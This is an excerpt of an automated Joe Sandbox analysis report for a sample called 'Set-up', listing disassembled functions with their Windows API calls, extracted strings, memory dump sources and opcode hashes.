                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 32a61ffe8294ae8e3481f9a87309bd85391c56d7fe2f648cf150b77a244fa995
                                                                                                                                                  • Instruction ID: b95b1213245d927c69f684149952510929cb8562e670bee94ddb7b8263dc6dab
                                                                                                                                                  • Opcode Fuzzy Hash: 32a61ffe8294ae8e3481f9a87309bd85391c56d7fe2f648cf150b77a244fa995
                                                                                                                                                  • Instruction Fuzzy Hash: AFB011E0C080808B8800AF20A88283AA238820B300F083828E00AE3203E200E800AA2E
                                                                                                                                                  Function 006A5C8C Relevance: .0, Instructions: 9COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d803f991a0724a844ad44556645a3331b5999ac08049c09205cb5f8298990558
                                                                                                                                                  • Instruction ID: b766038e46f1a7269febff52073cf5f0fd17543b8df62e16fa2f7736b757c252
                                                                                                                                                  • Opcode Fuzzy Hash: d803f991a0724a844ad44556645a3331b5999ac08049c09205cb5f8298990558
                                                                                                                                                  • Instruction Fuzzy Hash: A8B012D0C09440438440AF105801475E1784647200F043420D009A3103D200D504865E
                                                                                                                                                  Function 0041068E Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 181fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00410693
                                                                                                                                                  • OpenFileMappingA.KERNEL32(00000004,00000000,00000000), ref: 0041073E
                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041074F
                                                                                                                                                  • MapViewOfFile.KERNEL32(00000002,00000004,00000000,00000000,00000000,?), ref: 0041077B
                                                                                                                                                  • UnmapViewOfFile.KERNEL32(00000000,00000003), ref: 0041081C
                                                                                                                                                  • CloseHandle.KERNEL32(00000002), ref: 0041082A
                                                                                                                                                  • OpenEventA.KERNEL32(00000002,00000000,00000000), ref: 00410847
                                                                                                                                                  • GetLastError.KERNEL32 ref: 00410858
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$ErrorLastOpenView$CloseEventH_prologHandleMappingUnmap
                                                                                                                                                  • String ID: Can not open mapping$Incorrect mapping data$MapViewOfFile error$data error
                                                                                                                                                  • API String ID: 3506968402-3547812707
                                                                                                                                                  • Opcode ID: da2477a2165a13227efe224186e54d8d5a6c98100ad0ede2dff01170ae879be2
                                                                                                                                                  • Instruction ID: 7b5b358272eb6e2e3ea3abe31a1b729ff04944d7fa91e5682020db2250734308
                                                                                                                                                  • Opcode Fuzzy Hash: da2477a2165a13227efe224186e54d8d5a6c98100ad0ede2dff01170ae879be2
                                                                                                                                                  • Instruction Fuzzy Hash: E0618C71C05119AFCB11EFA5C895AEEBB76EF44308F10403EE505B7291DB781A85CBAA
                                                                                                                                                  Function 00471BCD Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 177COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LCMapStringW.KERNEL32(00000000,00000100,0047D0A8,00000001,00000000,00000000,7591E860,00495F44,?,?,?,00471A6E,?,?,?,00000000), ref: 00471C0F
                                                                                                                                                  • LCMapStringA.KERNEL32(00000000,00000100,0047D0A4,00000001,00000000,00000000,?,?,00471A6E,?,?,?,00000000,00000001), ref: 00471C2B
                                                                                                                                                  • LCMapStringA.KERNEL32(?,?,?,00471A6E,?,?,7591E860,00495F44,?,?,?,00471A6E,?,?,?,00000000), ref: 00471C74
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,D_I,?,00471A6E,00000000,00000000,7591E860,00495F44,?,?,?,00471A6E,?,?,?,00000000), ref: 00471CAC
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00471A6E,?,00000000,?,?,00471A6E,?), ref: 00471D04
                                                                                                                                                  • LCMapStringW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00471A6E,?), ref: 00471D1A
                                                                                                                                                  • LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?,00471A6E,?), ref: 00471D4D
                                                                                                                                                  • LCMapStringW.KERNEL32(?,?,?,?,?,00000000,?,?,00471A6E,?), ref: 00471DB5
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: String$ByteCharMultiWide
                                                                                                                                                  • String ID: D_I
                                                                                                                                                  • API String ID: 352835431-3136373921
                                                                                                                                                  • Opcode ID: 6f6a320ebd22060c3fa8a5b53effa347b0c05c668cffeaf4f3b0cc9d26c959d0
                                                                                                                                                  • Instruction ID: 0e2e896c49bff1b1b6807e03d1d0e510b282c7cf32459865d9691b8749b9733f
                                                                                                                                                  • Opcode Fuzzy Hash: 6f6a320ebd22060c3fa8a5b53effa347b0c05c668cffeaf4f3b0cc9d26c959d0
                                                                                                                                                  • Instruction Fuzzy Hash: C851BD31900249EFCF228F99CC44ADF7BB5FB89754F10852AF919A1270C3399A61DF69
                                                                                                                                                  Function 0040AFF2 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 78libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 0040B013
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 0040B01E
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 0040B029
                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000020,?), ref: 0040B043
                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040B088
                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040B09E
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressProc$CloseCurrentErrorHandleLastProcess
                                                                                                                                                  • String ID: AdjustTokenPrivileges$LookupPrivilegeValueA$OpenProcessToken$SeLockMemoryPrivilege
                                                                                                                                                  • API String ID: 3845410253-2730760130
                                                                                                                                                  • Opcode ID: 0b2cc48c3d3c4d5c062af241b6caa6a0fe5d0f3ac55c0216d33969c7b2eec483
                                                                                                                                                  • Instruction ID: 9de31247217a9212568b4247c2b257bbb6408e476a889291fcd689fac0313941
                                                                                                                                                  • Opcode Fuzzy Hash: 0b2cc48c3d3c4d5c062af241b6caa6a0fe5d0f3ac55c0216d33969c7b2eec483
                                                                                                                                                  • Instruction Fuzzy Hash: 55218E71940329AFDB105BA58C45AFFBBBCEF86B00F048836E511F2281D77D49499BA9
                                                                                                                                                  Function 00409F97 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 102threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00409FA5
                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00409FB0
                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,?,?,?,0040A1D5,00000012,00000000,?,00000003,00000000,?,?), ref: 00409FBB
                                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040A020
                                                                                                                                                  • SetLastError.KERNEL32(000000B7,?,?,?,?,?,0040A1D5,00000012,00000000,?,00000003), ref: 0040A053
                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,0040A1D5,00000012,00000000,?,00000003), ref: 0040A079
                                                                                                                                                    • Part of subcall function 004094FA: __EH_prolog.LIBCMT ref: 004094FF
                                                                                                                                                    • Part of subcall function 004094FA: CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000), ref: 00409524
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CountCurrentErrorLastTick$CreateDirectoryH_prologProcessThread
                                                                                                                                                  • String ID: .tmp$d
                                                                                                                                                  • API String ID: 43677640-2797371523
                                                                                                                                                  • Opcode ID: 0ab5e57f017d120bc9e5124009a47c42978d37bd9672d801d6d6d35e446eae8e
                                                                                                                                                  • Instruction ID: c4674485ca07991072ace2780f07c034f6046748332ee135b1031fc7861e7e83
                                                                                                                                                  • Opcode Fuzzy Hash: 0ab5e57f017d120bc9e5124009a47c42978d37bd9672d801d6d6d35e446eae8e
                                                                                                                                                  • Instruction Fuzzy Hash: 9631D4316403059BDB209F60C8897AD7360EF96319F14443BE806B72C2D77D4C65CB4A
                                                                                                                                                  Function 00471E1C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetStringTypeW.KERNEL32(00000001,0047D0A8,00000001,?,7591E860,00495F44,?,?,00471A6E,?,?,?,00000000,00000001), ref: 00471E5B
                                                                                                                                                  • GetStringTypeA.KERNEL32(00000000,00000001,0047D0A4,00000001,?,?,00471A6E,?,?,?,00000000,00000001), ref: 00471E75
                                                                                                                                                  • GetStringTypeA.KERNEL32(?,?,?,?,00471A6E,7591E860,00495F44,?,?,00471A6E,?,?,?,00000000,00000001), ref: 00471EA9
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,D_I,?,?,00000000,00000000,7591E860,00495F44,?,?,00471A6E,?,?,?,00000000,00000001), ref: 00471EE1
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,00471A6E,?), ref: 00471F37
                                                                                                                                                  • GetStringTypeW.KERNEL32(?,?,00000000,00471A6E,?,?,?,?,?,?,00471A6E,?), ref: 00471F49
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: StringType$ByteCharMultiWide
                                                                                                                                                  • String ID: D_I
                                                                                                                                                  • API String ID: 3852931651-3136373921
                                                                                                                                                  • Opcode ID: 2c2c12b03093ff175938c4e4e10ada18cc6c6c4b2bd054ef57623f5d0335fe7a
                                                                                                                                                  • Instruction ID: d0aeff106ebb83d899acd95286ba23b371c644fe91394e7f1cba238427989c8c
                                                                                                                                                  • Opcode Fuzzy Hash: 2c2c12b03093ff175938c4e4e10ada18cc6c6c4b2bd054ef57623f5d0335fe7a
                                                                                                                                                  • Instruction Fuzzy Hash: DF417F72A00149EFCF209F98DC85EEF7B78EB08754F108826F919E2260D3399955CB99
                                                                                                                                                  Function 004707C1 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100fileCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 0047082E
                                                                                                                                                  • GetStdHandle.KERNEL32(000000F4,0047CFDC,00000000,00000000,00000000,?), ref: 00470904
                                                                                                                                                  • WriteFile.KERNEL32(00000000), ref: 0047090B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$HandleModuleNameWrite
                                                                                                                                                  • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                                                  • API String ID: 3784150691-4022980321
                                                                                                                                                  • Opcode ID: c7c3addc6f2ba0fa178d61ed8d8e6645ffb1b4613aef6de6e596055583288bdd
                                                                                                                                                  • Instruction ID: 21453c154c087cdcd8d4fde53343803305a333df17ae47c7a858c06d4e6d664e
                                                                                                                                                  • Opcode Fuzzy Hash: c7c3addc6f2ba0fa178d61ed8d8e6645ffb1b4613aef6de6e596055583288bdd
                                                                                                                                                  • Instruction Fuzzy Hash: 6D31EA72A01208EFEF20AB64CC46FDE336CEF45344F10446BF54CE6151E6789A858B5E
                                                                                                                                                  Function 0040B634 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 40libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 0040B64B
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040B652
                                                                                                                                                  • GlobalMemoryStatus.KERNEL32(?), ref: 0040B68D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressGlobalHandleMemoryModuleProcStatus
                                                                                                                                                  • String ID: $@$GlobalMemoryStatusEx$kernel32.dll
                                                                                                                                                  • API String ID: 2450578220-802862622
                                                                                                                                                  • Opcode ID: 34ae1ecb10f56048fbf66bb278759217eb6dd1391e151d16168005e3e052f68d
                                                                                                                                                  • Instruction ID: b135d2f3381d44ac480494645a7cd0938dae793d85ba4191ada2bbe6e2a6206e
                                                                                                                                                  • Opcode Fuzzy Hash: 34ae1ecb10f56048fbf66bb278759217eb6dd1391e151d16168005e3e052f68d
                                                                                                                                                  • Instruction Fuzzy Hash: 7F014B70A0020D9BDF00DBE4D89AA9EB7B5FB44348F144D25E401F7294D739E9858B9D
                                                                                                                                                  Function 00470656 Relevance: 12.1, APIs: 8, Instructions: 132COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,0046D3E9), ref: 00470671
                                                                                                                                                  • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,0046D3E9), ref: 00470685
                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,0046D3E9), ref: 004706B1
                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,0046D3E9), ref: 004706E9
                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,0046D3E9), ref: 0047070B
                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,?,0046D3E9), ref: 00470724
                                                                                                                                                  • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,0046D3E9), ref: 00470737
                                                                                                                                                  • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00470775
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1823725401-0
                                                                                                                                                  • Opcode ID: 57e1f377e4aad6a101506f3ab0e42882e70f5c79bee1956c6bff922374264749
                                                                                                                                                  • Instruction ID: 0f1f5a0df5524138eab7177ed600212bcaa543921de78a68761284f1db32d8ec
                                                                                                                                                  • Opcode Fuzzy Hash: 57e1f377e4aad6a101506f3ab0e42882e70f5c79bee1956c6bff922374264749
                                                                                                                                                  • Instruction Fuzzy Hash: F6312872506251EFE7307F745CC48BB769CE695394711453BF54EC3300E629AC918BAE
                                                                                                                                                  Function 0043E01E Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 381COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0043E023
                                                                                                                                                    • Part of subcall function 004075D4: __EH_prolog.LIBCMT ref: 004075D9
                                                                                                                                                    • Part of subcall function 0040DC92: __EH_prolog.LIBCMT ref: 0040DC97
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                  • String ID: 128$192$256$AES$ZIPCRYPTO
                                                                                                                                                  • API String ID: 3519838083-2504388814
